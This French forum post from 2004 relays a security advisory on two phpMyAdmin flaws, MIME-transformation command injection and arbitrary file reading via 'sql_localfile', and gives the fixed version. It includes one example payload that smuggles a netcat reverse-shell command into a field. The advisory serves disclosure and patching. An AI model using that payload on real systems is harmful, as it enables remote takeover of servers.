website logo
Auteur
avatar
Anonyme

Forum » » Sécurité » » [Résolu] - Alerte PHPMYADMIN


Posté : 14 déc. 2004 à 16:44 icone du post

* Description Technique *

Deux vulnérabilités ont été identifiées dans phpMyAdmin, elles pourraient être exploitées par un attaquant distant afin de compromettre un système vulnérable. Le premier problème se situe au niveau des transformations externes MIME, ce qui pourrait permettre l'injection de commandes arbitraires (ex : F';nc -e /bin/sh $IP 80;echo 'A). La seconde vulnérabilité se situe au niveau du mécanisme UploadDir et read_dump.php qui ne filtrent pas correctement la variable "sql_localfile", ce qui pourrait permettre l'accès à des fichiers arbitraires.

Note : L'exploitation de ces vulnérabilités n'est possible que si "PHP safe mode" est à "off".

* Versions Vulnérables *

phpMyAdmin versions inférieures à 2.6.1-rc1

* Solution *

phpMyAdmin version 2.6.1-rc1 :
http://www.phpmyadmin.net/home_page/downloads.php

Source : K-otik

Cet article provient de NPDS
https://www.npds.org/viewtopic.php?topic=14730&forum=12